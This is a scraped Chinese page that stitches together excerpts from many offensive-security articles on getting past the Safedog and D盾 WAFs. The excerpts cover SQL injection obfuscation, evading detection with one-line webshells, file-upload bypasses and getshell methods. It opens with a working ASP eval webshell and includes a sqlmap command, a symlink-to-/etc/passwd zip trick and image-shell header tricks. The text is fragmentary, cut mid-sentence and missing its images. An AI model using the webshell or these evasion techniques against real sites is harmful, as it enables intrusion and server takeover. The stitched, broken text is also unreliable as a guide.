> asp: <% dim x1,x2 x1 = request("pass") x2 = x1 eval x2 %>
过安全狗waf注入 前提web页面存在注入漏洞 测试开始本地搭建环境 环境 安全狗(APACE版)V4.0 防护规则全开 绕过 1.
0x00 前言 最近看了不少关于WAF绕过的文章,想把理论深化到实践当中去,于是就有了您正在看的这篇文章,这篇文章分为两大部分,分别写的是SQL注入相关的WAF绕过和一句话木马免杀相关的WAF绕过,本文用来做测试的...WAF是安全狗(4.0最新版),在一句话木马免杀的章节也会提到一些绕过D盾的技巧。...0x01 绕过安全狗继续SQL注入 其实说白了,绕过WAF就是混淆你的SQL语句,让它以另一种方式呈现出来,以绕过WAF的黑名单正则表达式匹配,至于具体的混淆方法,网络上有很多的文章已经讲的够详细了,在这里我就直接进入实战环节...()*/ 使用这种方法SQL语句依然可以正确执行,而且会完美过狗!...,基于正则表达式匹配的WAF都是比较容易绕过的,WAF可以当做一种缓解措施但一定不要将它作为最终的防御手段!
用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样 本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了 无奈御剑和wscan...在这里可以设置不扫描文件类型,设置遇到表单自动登录,增加HTTP头(Cookie……), 以及代理设置,超时链接设置,默认线程,字典,扩展名设置 有时间的小伙伴自己捣鼓捣鼓 ,这里不多说了 如果想过waf
,另外一种为Customize(自定义)模式过WAF。...今天以自定义模式为例实例讲解秒过安全狗,当然文章发布过后各大WAF厂商肯定会将某些特征列入黑名单,这里只是抛砖引玉提供思路。...过WAF: 这是一款跨平台的基于配置文件的中国菜刀,把所有操作给予用户来定义,主程序只是图形的展示,以及数据的发送。...管理MYSQL数据库功能的代码放这儿 ASP_...=... ASPX_...=... JSP_...=... 除了修改以上参数过WAF外,程序还额外提供了一种Customize过WAF的模式。...如果一个很厉害的WAF检测eval,assert等关键词 ,你的一句话实在是饶不过,这个时候你可以不用一句话,就在PHP脚本里用正常代码实现列文件以及目录,然后用Customize模式连接就达到了过WAF
nice 有WAF, 赶紧去访问网站看看IP有没有被封 还好, 没有被封 ? 显示payload, 看看是哪句被拦截了 sqlmap -u "http://www.xxx.com?...将被拦截的payload的放到浏览器中去访问, 果然被WAF拦截了 ? 手工模糊测试, 发现被拦截的为关键字: FROM ?...这里说下个人思路: 在已经确定是什么WAF的前提下, 网上去查询过相关WAF的思路, 这里我找到了几个, 尝试后还是没有绕过去 sqlmap自带有过WAF脚本, 我去查询了下有没有能代替的其他关键字
项目介绍 大多数web应用程序防火墙(waf)在发送请求正文时,对它们可以处理的数据量有限制。...这意味着对于包含请求体(即POST、PUT、PATCH等)的HTTP请求,通常可以通过简单地添加垃圾数据来绕过WAF。...当请求中填充了垃圾数据时,WAF将处理X kb的请求并进行分析,但是超出WAF限制的所有数据都将直接通过 nowafpls是一个简单的Burp插件,它会将这些垃圾数据插入到repeater选项卡中的HTTP...这个工具只有80行左右的Python代码,非常简单,但适用于大多数WAFs WAF限制 WAF Provider Maximum Request Body Inspection Size Limit Cloudflare...on service) Akamai 8 KB - 128 KB Azure WAF 128 KB Fortiweb by Fortinet 100 MB Barracuda WAF 64 KB Sucuri
绕过安全狗上传asp一句话 绕过安全狗有朋友整理过的,我也读过一些文章,很有收获。...有狗我们也不怕,来到设置处增加上传类型asp: ? 然后返回预览处上传。t00ls中总结的帖子说到,我们可以利用包含的方法过安全狗的内容检查。...所以,我先上传一个含有一句话的gif文件,成功上传,没有拦截: ? 然后上传一个asp文件,包含这个gif。但上传的过程中发现,点上传界面就一直停留在等待的位置,我估计就是被狗咬了。...burpsuite抓包看一下,上传一个asp文件(我尝试过修改content-type,但也不行): ? 果然被狗咬了,403错误: ?...那么,狗一定是对上传文件的后缀进行了检查,导致我们不能上传asp文件。 这里我们有几个思路: 1.IIS6.0的话可以用解析漏洞,利用鬼哥文章里那几个过狗的解析漏洞利用方法过狗。
各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。...让小白从彻底理解马的含义,到打造属于自己过waf的马。...————–目录—————————————————————— php一句话含义 用js+php打造高效率一句话爆破脚本(知识扩充:CORS与AJAX) 简单介绍一句话上传攻防 一句话过waf思路 —...———–0x01.一句话过waf思路————————————————— 很多时候,我们辛辛苦苦上传的一句话,没过多久,就发现菜刀连不上了 这时候可能是因为管理员没事干,开了类似d盾的waf,把后门扫出来了...很正常,一个新的过waf一句话传出去,很快各个waf就会制定新规则,并且把新的马列入黑名单, 一旦出现一模一样的马,就标记威胁级别5,已知后门!
如asp中单引号表示单行注释作用"%><%' 编辑器模版Getshell 通过网站的模版编写一句话,然后生成脚本文件getshell 通过将木马添加到压缩文件...,把名字改为网站的模版类型,上传到服务器,getshell)(新建或修改目录名为xx.asp/ 此目录下的jsp,html会以asp执行,配置iis6.有0解析漏洞 修改脚本文件Getshell 修改后台脚本文件插入一句话直接...>" > 1.php Linux需要在$前加\进行防转义,Windows需要在<前加^防转义,Windows和Linux中的 “可以使用’或不使用进行尝试 文件包含Getshell 文件包含有时可绕过waf...>等一句话木马) 截取get请求 ? 将一句话木马 ? 浏览器访问查看是否成功 ?...cmd=ipconfig #cmd=后面加命令 方式七 过杀毒软件方式 上传图片马c.jpg,图片马内容如下: <?php 导出Webshell select '<?
主要说下后台getshell(过云盾拦截) Aspcms2.0系列后台姿势也很多, 首先是想着直接data/data.asp. 但是文件不存在。 然后看下后台配置文件, ?...后面就是直接上传大马或者一句话了。 我直接插入的一句话 ? 菜刀连之。。。 ? 这里需要过waf刀。
#写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。...因为在此之前waf肯定要对后门文件进行特征分析,这关过了,才到数据层,最后才到返回层,那么接下来第二章与第三章将从后门构造与数据提交角度来探讨过狗的方式。...如果上传这一步可以过,那么接下来就是对上传的文件内容进行被动查杀。 而后门特征的查杀一般在后门上传的过程与访问的过程,waf会使用相关的正则与代码预编译来判断是否为危险代码。...当我们的代码本身可以过狗,加工post数据后门执行也没有问题后,最后就是WAF对返回的敏感信息进行检测与过滤了。 除此之外WAF可能会对特殊上传的文件进行权限控制,例如无法执行某些命令等等。...理论篇其实本身并没有太多的东西可说,更多的是希望大家对于WAF有个初步的认识,不要盲(qiang)目(xing)过狗,滥用菜刀。
)3>后缀名黑名单校验4>后缀名白名单校验5>自定义正则校验6>WAF设备校验(根据不同的WAF产品而定) 2.Bypass 2.1 有些waf不会防asp/php/jsp后缀的文件,但是他会检测里面的内容...> ASP <!...Content-Disposition: form-data; name=“up_picture”; filename=“xss.jpg .Php” 百度云绕过就简单的很多很多,在对文件名大小写上面没有检测php是过了的,Php就能过,...或者PHP,一句话自己合成图片马用Xise连接即可。...三、Summary 研究WAF的绕过手段,是为了更好的提升WAF的防御能力。
4.文件包含、文件备份 假如网站存在文件包含漏洞,可利用文件包含 来包含任意文件,如包含png文件解析一句话木马。...IIS 6.0 1)目录名,包含 .asp.asa .cer,则该目录下的文件都将被解析为 .asp文件 ? 2)文件名中,分号本身以及后面的都会被系统忽略 a.asp;.gif ?...3)文件名,文件后缀名字中为.asp .asa .cer 之一,都会被解析为 .asp文件 ?...1)利用SQL执行来写入一句话到网站后台中。 ? 如果网站的my.ini文件中没有包含“secure_file_priv=”这句话,就会提示如下错误信息。 ?...之后在“SQL”执行功能中输入一句话并执行就OK了,log将记录这一句话。 ? 结合前段时间的学习并下面文章所写。
sql注入阶段 看看if能不能用添加描述看看 iif 能不能用添加描述看看case when能不能用添加描述还发现有个waf添加描述都不能用,使用大招 rlike 报错添加描述添加描述可行可行,构建条件语句添加描述又是...waf,试试注释符号绕过添加描述完美!!!!!...因为怕触发waf直接使用常量 like添加描述添加描述添加描述注入出数据库用户名:jr_% 收工收工。原文链接:https://forum.butian.net/share/2618
sql注入阶段 看看if能不能用 看看 iif 能不能用 看看case when能不能用 还发现有个waf 都不能用,使用大招 rlike 报错 可行可行,构建条件语句 又是waf,试试注释符号绕过...因为怕触发waf直接使用常量 like 注入出数据库用户名:jr_% 收工收工。 原文链接:https://forum.butian.net/share/2618
上传流程 上传流程以及对应的检测点 前端选择文件,点击上传 JavaScript检测 Flash AS检测 浏览器形成POST MultPart报文发送到服务器 WAF拦截 IPS拦截 服务器中间件接收报文...,解析后交给相关后端代码处理 扩展名检测 文件格式检测 MIME Type检测 内容检测(同WAF/IDS) 后端代码将文件内容写入临时文件中(PHP特有) 文件重命名 杀毒软件查杀 写入到文件后,...在线解压缩搭配文件软链接 $ ln -s /etc/passwd a # 可通过ls -l检查 $ ls -l ... a -> /etc/passwd $ zip --symlinks 1.zip a 常见木马 一句话木马...:伪造文件头,在一句话木马前面加入GIF89a,然后将木马保存为图片格式,如.jpg/.png/.gif 检验文件类型:修改 文件包含过WAF:在不含恶意代码的脚本文件中,通过文件包含引入含有恶意代码但后缀为图片格式的文件...因为含有恶意代码的文件后缀为图片,WAF不会检查其中内容;而不含恶意代码的脚本文件中,因为不含恶意代码所以WAF不会检测出异常,从而达到绕过WAF。 ----
测试开始 $ http://xxxxxxx.com/Manage/login.asp 登陆界面: ? 帐号密码是弱密码。...通过前面的信息我们可以看到这是asp+iis的站点,但是数据库备份的地点原始数据库不能更改但是备份数据库的可以更改,这比较简单,突破一下,抓包改一改就行。...看到这个返回就知道成功了,可以看到这个是有waf的,有狗的话可以注意过狗,狗的话虽然看着很凶,博主最近和狗打了太多的交道了,也就那几招,过多了就发现就是傻狗。一句话变相一下就行。...大概看了看,返回有FolderBackUp.asp然后请求的是/Manage/DataBackUp.asp这个路径,然后后台也说了备份文件夹是databackup,大概测了测就猜到了: $ http:...//xxxxxx.com/Manage/databackup/mssqldb.asp 然后菜刀连接一下就行了: ?
领取专属 10元无门槛券
手把手带您无忧上云